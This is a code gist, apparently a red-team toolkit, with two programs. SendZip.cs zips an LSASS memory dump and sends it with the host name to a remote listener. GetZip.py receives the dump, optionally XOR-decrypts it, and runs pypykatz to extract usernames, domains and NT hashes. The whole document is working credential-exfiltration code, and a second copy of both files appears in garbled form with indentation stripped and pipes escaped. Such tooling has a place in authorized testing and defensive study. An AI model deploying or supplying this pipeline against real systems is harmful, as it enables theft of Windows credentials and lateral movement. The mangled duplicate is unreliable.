snovvcrash/GetZip.py

## GetZip.py
#!/usr/bin/env python3

# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] --md5 --parse
# Requirements: pip3 install tqdm pypykatz

import os
import socket
import zipfile
import hashlib
from argparse import ArgumentParser

import tqdm

BUFFER_SIZE = 4096
SEPARATOR = '|'


def parse_args():
	parser = ArgumentParser()
	parser.add_argument('host', action='store', type=str, help='address to listen on')
	parser.add_argument('port', action='store', type=int, help='port to listen on')
	parser.add_argument('--xor', action='store', type=int, choices=range(256), default=None, help='XOR-decrypt the dump with provided key')
	parser.add_argument('--md5', action='store_true', default=False, help='calculate MD5 hash')
	parser.add_argument('--parse', action='store_true', default=False, help='parse the dump with pypykatz and print the results')
	return parser.parse_args()


def serve(host, port):
	sock = socket.socket()

	sock.bind((host, port))
	sock.listen(5)
	print(f'Serving socket server on {host} port {port} ...')

	client_socket, addr = sock.accept()
	client_host, client_port = addr
	print(f'[+] Received connection from {client_host}:{client_port}')

	received = client_socket.recv(BUFFER_SIZE).decode()
	filename, filesize = received.split(SEPARATOR)
	filename, filesize = f'{filename}.zip', int(filesize)

	print('[*] Started downloading LSASS dump...')

	with tqdm.tqdm(range(filesize), filename, ncols=100, unit='B', unit_scale=True, unit_divisor=1024) as pbar:
		with open(filename, 'wb') as f:
			while True:
				bytes_read = client_socket.recv(BUFFER_SIZE)
				if not bytes_read:
					break
				f.write(bytes_read)
				pbar.update(len(bytes_read))

	client_socket.close()
	sock.close()

	return filename


def extract_zip(zipname, md5=False):
	if md5:
		with open(zipname, 'rb') as f:
			h = hashlib.md5()
			for chunk in iter(lambda: f.read(4096), b''):
				h.update(chunk)

		print(f'[*] MD5: {h.hexdigest()}')

	with zipfile.ZipFile(zipname, 'r') as zf:
		for name in zf.namelist():
			extracted_name = zf.extract(name)
			extracted_name = os.path.basename(extracted_name)
			new_name = zipname.replace('zip', 'dmp')
			os.rename(extracted_name, new_name)
			print(f'[+] {zipname} was extracted to {new_name}')

	os.remove(zipname)

	return new_name


def xor(datafile, key):
	with open(datafile, 'rb') as f:
		data = f.read()

	with open(datafile, 'wb') as f:
		f.write(bytes(b ^ key for b in data))

	print(f'[+] {datafile} was XOR-decrypted with key 0x{key:02x}')


if __name__ == '__main__':
	args = parse_args()

	zipname = serve(args.host, args.port)
	datafile = extract_zip(zipname, args.md5)

	if args.xor is not None:
		xor(datafile, args.xor)

	if args.parse:
		parsed_name = datafile.replace('dmp', 'parsed')
		print('[=] Parsing with pypykatz...')
		os.system(f"""pypykatz lsa minidump {datafile} > {parsed_name}""")
		#print('[+] Passwords:')
		#os.system(f"""grep -a -P '\tusername ' {parsed_name} -A2 | grep -a -e username -e password | grep -a -v None""")
		print('[+] Hashes:')
		os.system(f"""grep -a -P 'Username: ' {parsed_name} -A4 | grep -a -e Username -e Domain -e NT | grep -a -v None""")

## SendZip.cs
// Usage: SendZip.exe 10.10.13.37 1337 C:\Windows\Temp\lsass.bin
// Requirements: System.IO.Compression

using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Net.Sockets;
using System.Security.Cryptography;

namespace SendZip
{
    class Program
    {
        static void SendZip(string host, int port, byte[] data)
        {
            using (var outStream = new MemoryStream())
            {
                using (var archive = new ZipArchive(outStream, ZipArchiveMode.Create, true))
                {
                    var zipFile = archive.CreateEntry($"{Guid.NewGuid()}.bin");
                    using (var entryStream = zipFile.Open())
                    {
                        using (var dumpCompressStream = new MemoryStream(data))
                        {
                            dumpCompressStream.CopyTo(entryStream);
                        }
                    }
                }

                byte[] compressedBytes = outStream.ToArray();

                Console.WriteLine($"[+] Minidump successfully packed, size {Math.Round(compressedBytes.Length / 1024.0 / 1024.0, 2)} MB");

                byte[] zipHashBytes = MD5.Create().ComputeHash(compressedBytes);
                string zipHash = BitConverter.ToString(zipHashBytes).Replace("-", "");

                Console.WriteLine($"[*] MD5: {zipHash}");

                using (var tcpClient = new TcpClient(host, port))
                {
                    using (var netStream = tcpClient.GetStream())
                    {
                        string hostName = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
                        string zipSize = (compressedBytes.Length).ToString();
                        byte[] stage = Encoding.ASCII.GetBytes($"{hostName}|{zipSize}");
                        netStream.Write(stage, 0, stage.Length);
                        netStream.Write(compressedBytes, 0, compressedBytes.Length);
                    }
                }
            }
        }

        static void Main(string[] args)
        {
            var host = args[0];
            var port = int.Parse(args[1]);
            var data = File.ReadAllBytes(args[2]);
            SendZip(host, port, data);
        }
    }
}
	#!/usr/bin/env python3

	# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] --md5 --parse
	# Requirements: pip3 install tqdm pypykatz

	import os
	import socket
	import zipfile
	import hashlib
	from argparse import ArgumentParser

	import tqdm

	BUFFER_SIZE = 4096
	SEPARATOR = '\|'


	def parse_args():
	parser = ArgumentParser()
	parser.add_argument('host', action='store', type=str, help='address to listen on')
	parser.add_argument('port', action='store', type=int, help='port to listen on')
	parser.add_argument('--xor', action='store', type=int, choices=range(256), default=None, help='XOR-decrypt the dump with provided key')
	parser.add_argument('--md5', action='store_true', default=False, help='calculate MD5 hash')
	parser.add_argument('--parse', action='store_true', default=False, help='parse the dump with pypykatz and print the results')
	return parser.parse_args()


	def serve(host, port):
	sock = socket.socket()

	sock.bind((host, port))
	sock.listen(5)
	print(f'Serving socket server on {host} port {port} ...')

	client_socket, addr = sock.accept()
	client_host, client_port = addr
	print(f'[+] Received connection from {client_host}:{client_port}')

	received = client_socket.recv(BUFFER_SIZE).decode()
	filename, filesize = received.split(SEPARATOR)
	filename, filesize = f'{filename}.zip', int(filesize)

	print('[*] Started downloading LSASS dump...')

	with tqdm.tqdm(range(filesize), filename, ncols=100, unit='B', unit_scale=True, unit_divisor=1024) as pbar:
	with open(filename, 'wb') as f:
	while True:
	bytes_read = client_socket.recv(BUFFER_SIZE)
	if not bytes_read:
	break
	f.write(bytes_read)
	pbar.update(len(bytes_read))

	client_socket.close()
	sock.close()

	return filename


	def extract_zip(zipname, md5=False):
	if md5:
	with open(zipname, 'rb') as f:
	h = hashlib.md5()
	for chunk in iter(lambda: f.read(4096), b''):
	h.update(chunk)

	print(f'[*] MD5: {h.hexdigest()}')

	with zipfile.ZipFile(zipname, 'r') as zf:
	for name in zf.namelist():
	extracted_name = zf.extract(name)
	extracted_name = os.path.basename(extracted_name)
	new_name = zipname.replace('zip', 'dmp')
	os.rename(extracted_name, new_name)
	print(f'[+] {zipname} was extracted to {new_name}')

	os.remove(zipname)

	return new_name


	def xor(datafile, key):
	with open(datafile, 'rb') as f:
	data = f.read()

	with open(datafile, 'wb') as f:
	f.write(bytes(b ^ key for b in data))

	print(f'[+] {datafile} was XOR-decrypted with key 0x{key:02x}')


	if __name__ == '__main__':
	args = parse_args()

	zipname = serve(args.host, args.port)
	datafile = extract_zip(zipname, args.md5)

	if args.xor is not None:
	xor(datafile, args.xor)

	if args.parse:
	parsed_name = datafile.replace('dmp', 'parsed')
	print('[=] Parsing with pypykatz...')
	os.system(f"""pypykatz lsa minidump {datafile} > {parsed_name}""")
	#print('[+] Passwords:')
	#os.system(f"""grep -a -P '\tusername ' {parsed_name} -A2 \| grep -a -e username -e password \| grep -a -v None""")
	print('[+] Hashes:')
	os.system(f"""grep -a -P 'Username: ' {parsed_name} -A4 \| grep -a -e Username -e Domain -e NT \| grep -a -v None""")
	// Usage: SendZip.exe 10.10.13.37 1337 C:\Windows\Temp\lsass.bin
	// Requirements: System.IO.Compression

	using System;
	using System.IO;
	using System.IO.Compression;
	using System.Text;
	using System.Net.Sockets;
	using System.Security.Cryptography;

	namespace SendZip
	{
	class Program
	{
	static void SendZip(string host, int port, byte[] data)
	{
	using (var outStream = new MemoryStream())
	{
	using (var archive = new ZipArchive(outStream, ZipArchiveMode.Create, true))
	{
	var zipFile = archive.CreateEntry($"{Guid.NewGuid()}.bin");
	using (var entryStream = zipFile.Open())
	{
	using (var dumpCompressStream = new MemoryStream(data))
	{
	dumpCompressStream.CopyTo(entryStream);
	}
	}
	}

	byte[] compressedBytes = outStream.ToArray();

	Console.WriteLine($"[+] Minidump successfully packed, size {Math.Round(compressedBytes.Length / 1024.0 / 1024.0, 2)} MB");

	byte[] zipHashBytes = MD5.Create().ComputeHash(compressedBytes);
	string zipHash = BitConverter.ToString(zipHashBytes).Replace("-", "");

	Console.WriteLine($"[*] MD5: {zipHash}");

	using (var tcpClient = new TcpClient(host, port))
	{
	using (var netStream = tcpClient.GetStream())
	{
	string hostName = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
	string zipSize = (compressedBytes.Length).ToString();
	byte[] stage = Encoding.ASCII.GetBytes($"{hostName}\|{zipSize}");
	netStream.Write(stage, 0, stage.Length);
	netStream.Write(compressedBytes, 0, compressedBytes.Length);
	}
	}
	}
	}

	static void Main(string[] args)
	{
	var host = args[0];
	var port = int.Parse(args[1]);
	var data = File.ReadAllBytes(args[2]);
	SendZip(host, port, data);
	}
	}
	}